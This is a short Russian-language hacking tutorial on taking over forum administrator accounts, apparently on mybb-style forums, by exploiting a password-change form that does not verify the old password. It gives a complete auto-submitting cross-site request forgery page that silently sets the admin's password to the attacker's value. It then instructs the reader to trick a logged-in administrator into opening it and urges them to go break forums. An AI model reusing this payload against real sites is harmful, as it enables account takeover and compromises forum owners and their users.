1) Если тебе необходимо взломать форум, не торопсись, сначала всё обдумай, осмотрись. Для начала ты должен зарегестрироваться, найти администратора форума. Теперь, можно приступать к главной цели - взлому.

2) Формы. Дело в том что для каждого ресурса где есть какие-либо формы(поля) куда можно вбивать запросы, есть возможность сделать лже-форму, с другими данными именами и атрибутами, или же просто скопировать оригинал.

3) Чем тебе помогут эти самые формы: В форумах mybb при изменении пароля через профиль юзевера(админа) нет проверки текущего(старого) пароля. Это означает, что ты можешь сделать лже-форму и вбить в неё новые значения переменных, в данном случае это req_new_password1 и req_new_password2. Первая просит ввести новый пароль, а вторая требует подтвердить его. Следовательно, создаём страничку с содержанием следущего кода:

<script lang=javascript>
  function hackedforum () {
document.hacked.submit();
  }
</script>
<body onload="hackedforum()">
<form method="post" name="hacked" action="http://ЦЕЛЬ(АДРЕС ФОРУМА)/profile.php?action=change_pass&amp;id=2">
<input type="hidden" name="form_sent" value="1">
<input type="hidden" name="req_new_password1" value="your_password">
<input type="hidden" name="req_new_password2" value="your_password">
</form>

4) Эту страничку ты должен впарить администратору форума, причём в тот момент, когда он авторизован. Теперь вооружившись уязвимостью и своей головой, иди и ломай форумы mybb которые тебе нужны.